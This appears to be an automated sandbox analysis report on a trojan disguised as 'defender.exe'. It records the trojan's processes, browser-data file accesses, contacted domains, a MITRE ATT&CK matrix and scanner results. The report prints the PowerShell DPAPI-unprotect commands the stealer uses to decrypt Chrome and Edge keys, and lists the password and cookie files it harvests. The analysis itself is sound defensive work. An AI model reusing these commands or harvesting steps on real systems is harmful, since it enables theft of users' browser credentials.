Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "c:\users\user~1\appdata\local\temp\2gocimwnf4mqselug17heiczrtp\defender.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\defender" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1832 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "c:\users\user~1\appdata\local\temp\2gocimwnf4mqselug17heiczrtp\defender.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\defender" --mojo-platform-channel-handle=2132 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "c:\users\user~1\appdata\local\temp\2gocimwnf4mqselug17heiczrtp\defender.exe" --type=renderer --user-data-dir="c:\users\user\appdata\roaming\defender" --app-path="c:\users\user~1\appdata\local\temp\2gocimwnf4mqselug17heiczrtp\resources\app.asar" --no-sandbox --no-zygote --first-renderer-process --lang=en-gb --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1722781275767759 --launch-time-ticks=4443586976 --mojo-platform-channel-handle=2360 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:1
Source: explorer.exe, 0000001D.00000000.1772539756.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.1773930118.0000000004880000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1776329895.0000000009013000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001D.00000000.1772539756.0000000001441000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | Binary or memory string: ..\..\electron\shell\browser\ui\views\electron_views_delegate_win.ccGetAppbarAutohideEdgesShell_TrayWnd
Source: explorer.exe, 0000001D.00000000.1772539756.0000000001441000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
Source: explorer.exe, 0000001D.00000000.1771958390.0000000000C59000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman
Source: explorer.exe, 0000001D.00000000.1772539756.0000000001441000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\672e2c2b3206cc57c836d5e96ea2e71e VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\672e2c2b3206cc57c836d5e96ea2e71e\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\672e2c2b3206cc57c836d5e96ea2e71e\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\672e2c2b3206cc57c836d5e96ea2e71e.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\resources VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\resources\app.asar VolumeInformation

Stealing of Sensitive Information

Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File read: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\672e2c2b3206cc57c836d5e96ea2e71e\Cookies\Google_Default.txt
MITRE ATT&CK Matrix (one line per tactic; the number in parentheses is the badge shown beside that technique in the report)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (12); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (111); Virtualization/Sandbox Evasion (21); Process Injection (12); Obfuscated Files or Information (1); DLL Side-Loading (1); Steganography; Compile After Delivery; Indicator Removal from Tools
Credential Access: OS Credential Dumping (1); Credentials In Files (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Query Registry (1); Security Software Discovery (1); Process Discovery (3); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (23)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Data from Local System (11); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (3); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (ID: 1487580; Sample: SecuriteInfo.com.HEUR.Troja...; Startdate: 04/08/2024; Architecture: WINDOWS; Score: 60)

Root node
  DNS/IP: www.setekshome.com; ws-eu.pusher.com; 6 other IPs or domains
  Signatures: Icon mismatch, binary includes an icon from a different legit application in order to fool users; AI detected suspicious sample
  Started: SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe

SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
  Dropped: C:\Users\user\AppData\Local\...\defender.exe (PE32+); C:\Users\user\AppData\Local\...\nsis7z.dll (PE32); C:\Users\user\AppData\Local\...\System.dll (PE32); 12 other files (none is malicious)
  Signatures: Drops large PE files
  Started: defender.exe

defender.exe
  DNS/IP: setekshome.com 185.111.234.27, 443, 49712, 49713 TR-FBSTR Turkey; clientstats1-dummy-server-lb-398743415.us-east-1.elb.amazonaws.com 3.222.214.216, 443, 49732 AMAZON-AESUS United States; 3 other IPs or domains
  Dropped: C:\Users\user\AppData\Local\...\webdata.db (SQLite); C:\Users\user\AppData\Local\...\passwords.db (SQLite); 31dd1108-f1cf-4a57...8839a99b19.tmp.node (PE32+)
  Signatures: Tries to harvest and steal browser information (history, passwords, etc)
  Started: defender.exe; cmd.exe; cmd.exe; 5 other processes

defender.exe (child of defender.exe)
  DNS/IP: chrome.cloudflare-dns.com 162.159.61.3, 443, 49722 CLOUDFLARENETUS United States; 172.64.41.3, 443, 49723 CLOUDFLARENETUS United States

cmd.exe (each of the two instances)
  Started: powershell.exe; conhost.exe

5 other processes
  Started: tasklist.exe; tasklist.exe; conhost.exe; conhost.exe

No Antivirus matches
Source | Detection | Scanner
C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\d3dcompiler_47.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\ffmpeg.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\libEGL.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\libGLESv2.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\31dd1108-f1cf-4a57-b5c5-108839a99b19.tmp.node | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\d3dcompiler_47.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\defender.exe | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\ffmpeg.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\libEGL.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\libGLESv2.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\resources\elevate.exe | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\vk_swiftshader.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\vulkan-1.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\System.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\nsis7z.dll | 0% | ReversingLabs
No Antivirus matches
Source | Detection | Scanner
chrome.cloudflare-dns.com | 0% | Virustotal
clientstats1-dummy-server-lb-398743415.us-east-1.elb.amazonaws.com | 0% | Virustotal
ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com | 0% | Virustotal
socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com | 0% | Virustotal
setekshome.com | 0% | Virustotal
sockjs-eu.pusher.com | 0% | Virustotal
stats.pusher.com | 0% | Virustotal
ws-eu.pusher.com | 0% | Virustotal
www.setekshome.com | 0% | Virustotal
Source | Detection | Scanner | Label
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe
https://support.google.com/chrome/answer/6098869 | 0% | URL Reputation | safe
https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe
